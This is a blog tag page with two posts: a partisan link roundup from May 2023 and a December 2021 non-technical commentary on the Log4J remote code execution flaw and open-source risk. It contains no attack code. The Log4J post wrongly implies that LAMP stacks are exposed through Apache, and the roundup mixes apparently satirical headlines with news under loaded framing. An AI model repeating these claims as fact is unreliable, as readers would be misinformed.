Posts Tagged ‘Open Source’

LinkSwarm for May 5, 2023

Friday, May 5th, 2023

A Soros-backed DA is stepping down, a Harvard prof lying about playing footsie with commies sentenced, and another Democratic fundraiser convicted of fraud. It’s the Friday LinkSwarm!

  • Good news, everyone! Soros-backed St. Louis Democrat DA Kim Gardner has resigned.

    On Thursday, a progressive prosecutor who was notoriously funded by far-left billionaire George Soros announced her resignation, after months of bipartisan pressure to do so.

    Fox News reports that Kim Gardner, the Circuit Attorney for St. Louis, announced that her resignation will be effective June 1st. Gardner was one of the first prosecutors in the country to be bankrolled by Soros, who has since expanded his efforts to other major cities across the country. She was first elected in 2016 and re-elected in 2020, largely due to Soros’ financial backing. Prior to her resignation announcement, she had declared her intention to run for a third term in 2024.

    After years of criticism for being soft on crime and siding with criminals over victims, Gardner faced a whole new wave of criticism from both parties over an incident in February: Teenage volleyball player Janae Edmonson, who was visiting St. Louis from Tennessee for a tournament, was hit by an out-of-control car while crossing the road; although Edmonson survived, she had to have both of her legs amputated.

    The driver of the car was Daniel Riley, a man who was out on bond while awaiting trial for an armed robbery case. It was later revealed that Riley had violated the terms of bond dozens of times, but was never arrested. When the blame turned to Gardner for failing to keep him off the streets, she falsely claimed that her office had attempted to have Riley jailed once again, only to be denied by a judge; there are no records of her office filing any such motion or otherwise seeking the revocation of Riley’s bond.

    Following the Edmonson incident, Missouri Attorney General Andrew Bailey (R-Mo.) filed a petition quo warranto, the process by which the state attorney general can fire a prosecutor who has been determined to be neglectful of her duties. Bailey claimed that as many as 12,000 criminal cases have been dismissed due to Gardner’s failures, with another 9,000 having been thrown out right before they were set to go to trial, due to Garnder’s office refusing to provide evidence and speedy trials for defendants.

    After Gardner’s announcement, Bailey released a statement demanding that she vacate her office immediately, rather than wait for another month.

  • The Biden Banking Crisis continues to bubble along. First Horizon, PacWest, and Western Alliance are the new banks facing trouble. (Hat tip: Stephen Green at Instapundit.)
  • Wagner Chief to Pull Mercenaries Out of Bakhmut over Ammunition Dispute with Russian Military.”

    Wagner Group chief Yevgeny Prigozhin said he will pull his mercenaries out of the meat grinder that is the Ukrainian city of Bakhmut on May 10, one day after Russia’s Victory Day Celebrations, which Russian president Vladimir Putin is expected to use to shore up support for the Russian invasion.

    The Wagner Group, a well-known mercenary unit known to be one of Russia’s most competent fighting divisions, is leading the charge on Bakhmut, a city that that has gained outsized symbolic importance.

    “I am withdrawing the Wagner PMC units from Bakhmut, because in the absence of ammunition they are doomed to senseless death,” Prigozhin said in full military fatigues and carrying an automatic weapon. The video he released showed him surrounded by masked Wagner fighters. Prigozhin also released a statement to the same effect.

    His forces had no choice but to withdraw to rear bases to “lick the wounds,” said Prigozhin, as translated by the Washington Post. If Wagner goes through with the withdrawal, it would be viewed as catastrophic in terms of morale. The Russian invasion has ground to a standstill after large-scale Russian and Ukrainian offensives last year. Kyiv, which has been amassing ammunitions including tanks and fighter jets, is expected to launch a fresh counterattack in the very near future.

    Prigozhin also launched a remarkable video tirade overnight on Telegram in which he displayed bodies of dozens of Wagner soldiers killed in Bakhmut. He angrily laid into the Russian Defense minister Sergei Shoigu and Valery Gerasimov, chief of the general staff of the Russian armed forces, for supplying Wagner with only 30 percent of the ammunition that’s needed.

    The statement released today claimed that number was even lower, standing at 10 percent.

    One caveat is that we’ve heard complaints from Prigozhin about his ammo supply before.

  • Russian soldiers dig trenches in horse graveyard in occupied Ukraine. Now they have anthrax.
  • Biden CIA chief met with Epstein several times after financier convicted of child sex crime. Central Intelligence Agency Director William Burns had three meetings with Jeffrey Epstein in 2014, when the top spy official was deputy secretary of state and after Epstein was convicted of child sex exploitation.” (Hat tip: Stephen Green at Instapundit.)
    

  • “Harvard chemistry professor sentenced for lying about ties to CCP…Former Harvard University Chemistry Department Chair Charles M. Lieber was sentenced Wednesday to time served and over $80,000 in fines for committing fraud and for failing to disclose his connections to the Chinese Communist Party.” (Hat tip: Instapundit.)
  • Longtime Democratic Campaign Strategist Charged with Election Fraud.” And completely different than the Democratic Party fundraiser convicted of fraud last week.

    New Jersey Democratic campaign strategist James Devine was charged with election fraud for allegedly submitting more than 1,900 fake petitions to help secure a 2021 Democratic gubernatorial primary ballot spot for candidate Lisa McCormick, New Jersey Attorney General Matthew Platkin announced Tuesday.

    Devine was McCormick’s campaign manager and sent the fake voter certifications to the New Jersey Secretary of State’s Division of Elections via email in April 2021, but the New Jersey Democratic State Committee challenged his attempt days later, arguing that all the forms featured same the style of signature and at least one of the named voters was deceased, Platkin said.

    A judge subsequently took McCormick off the primary ballot, and Devine is now charged with third-degree offenses concerning nomination certificates or petitions, tampering with public records or information and fourth-degree falsifying or tampering with records.

    (Hat tip: Instapundit.)

  • “Kansas Becomes 1st State to Pass Law Defining Gender as a Person’s Sex at Birth.” One down, forty-nine to go…
  • Killer in Satan’s service finds the left’s child sexual mutilation fetish disgusting.
  • Shots of Minneapolis before and after the Antifa/BLM riots of 2020.
  • El Paso Engulfed In ‘Mass Migration Dumpster Fire‘ As State Of Emergency Declared.”
  • Accused serial black widow killer charged with murdering her fifth husband.
  • “You just killed two people tonight.” “Yeah, but when can I go back to school?”
  • California banning diesel effective 2036.
  • Could sexbots and AI end humanity?
  • “Googlers angry about CEO’s $226M pay after cuts in perks and 12,000 layoffs.” Funny how you never hear the “Occupy Wall Street” crowd going after the Sundar Pichais of the world.
  • Speaking of Google, I’m hardly an expert on AI, but here’s a piece that claims Google is getting its clocked cleaned by OpenSource AI.

    LoRA updates are very cheap to produce (~$100) for the most popular model sizes. This means that almost anyone with an idea can generate one and distribute it. Training times under a day are the norm. At that pace, it doesn’t take long before the cumulative effect of all of these fine-tunings overcomes starting off at a size disadvantage. Indeed, in terms of engineer-hours, the pace of improvement from these models vastly outstrips what we can do with our largest variants, and the best are already largely indistinguishable from ChatGPT. Focusing on maintaining some of the largest models on the planet actually puts us at a disadvantage.

    (Hat tip: Ace of Spades HQ.)

  • The Case of the Disappearing Swiss Cheese Holes.
  • Wes Anderson’s Star Wars.
  • A nice stroke of book collecting luck: I picked up an inscribed presentation copy of H. G. Wells’ The Food of the Gods. Or rather, I picked it up as part of a multibook lot back in February and didn’t realize it was inscribed until last week.
  • “Biden Deploys 1,500 Troops At Border To Help Register New Voters.”
  • “Pro Disc Golfer Disqualified After Testing Negative For Cannabis.”
  • Log4J and Internet Castles Made of Sand

    Thursday, December 16th, 2021

    If you work outside of a tech company, chances are you’ve spent this week primarily concerned with getting ready for Christmas. If you work inside a tech company, there’s a significant chance your company spent much of this week patching a critical vulnerability in an open source Java logging library called Log4J.

    Here’s a non-technical explanation of the problem:

    It’s a vulnerability that was discovered in a piece of free, open source software called log4j. This software is used by thousands of websites and applications, to perform mundane functions most people don’t think about, such as logging information for use by that website’s developers, for debugging and other purposes.

    Every web application needs functionality like this, and as a result, the use of log4j is ubiquitous worldwide. Unfortunately, it turns out log4j has a previously undiscovered security vulnerability where data sent to it through that website — if it contains a special sequence of characters — results in log4j automatically fetching additional software from an external website and running it. If a cyberattacker exploits this, they can make the server that is running log4j run any software they want — including software that can completely take over that server. This is known as a Remote Code Execution (RCE) attack.

    To use a technical phrase, this is Really Bad.

    The net result is that, left unaddressed, cyberattackers right now can completely take over thousands of websites and online applications, allowing them to steal money, data, and access. The security community has been completely focused on this vulnerability for the past two days, and updating servers running log4j as quickly as possible to protect against this vulnerability.

    The good news is that mitigations are relatively easy to implement. The bad news is that left unmitigated, the vulnerability is extremely easy to exploit. iCloud, Minecraft, Baidu, and many other sites have been confirmed to be vulnerable so far, and you’ll likely hear more about many other sites being vulnerable in the coming days.

    And those companies are just the tip of the iceberg. LAMP stacks (Linux, Apache, MySQL, and PHP) are used as the technological underpinnings for a wide variety of web applications of all sizes. (It’s not universal, as NGINX has taken over as a market leader from Apache, and there are still a few all-Microsoft houses that use IIS, and neither of them have the vulnerability.)

    Open Source has been a revolutionary invention because it provides rapid development by armies of distributed developers, and Linus’s Law states that “with enough eyes, all bugs are shallow.” But there are tens of thousands of Open Source components out there running critical infrastructure that haven’t had nearly as many eyes on the code as the Linux kernel. It’s simply the nature of the beast. XKCD had a cartoon for this occasion:

    Internet applications gain usefulness from widespread adoption and the number of other components they tie into and support. You know what creates new vulnerabilities? A larger user base and the number of other components they tie into and support, which creates more attack surfaces for malicious actors to exploit.

    The flaw isn’t the fault of Random Guy in Nebraska, the fault is the company adopting software that they can’t possibly test for all the use-cases they’re going to use it for. Surprise! Just about every high tech company in the world is in the same boat. Pretty much everyone uses a wide panoply of open source tools for their Internet applications, and no one can test all the permutations of how each component might be put to use.

    You can’t eliminate the risk, you can only minimize and mitigate it. You can use containerization strategies (Docker, Kubernetes, Container D, etc.) to minimize attack surfaces and limit contagion. You can run all your code through security scanning tools on your CI/CD platform of choice. You can do constant testing and keep rolling backups of everything to limit risk and speed recovery. (You can also train your employees not to click on random email links without verifying the sender is who they say they are, and not to give any any account information or passwords over the phone, and train them enough so that the lessons stick, even though phising and human engineering weren’t factors in the Log4J vulnerability.)

    But there still a good chance that the platform you’re using today is different than the platform you’ll be using ten years from now, and you’ll have to go through the same learning lessons discovering new vulnerabilities for the new platform all over again.

    Castles made of sand all fall into the sea eventually…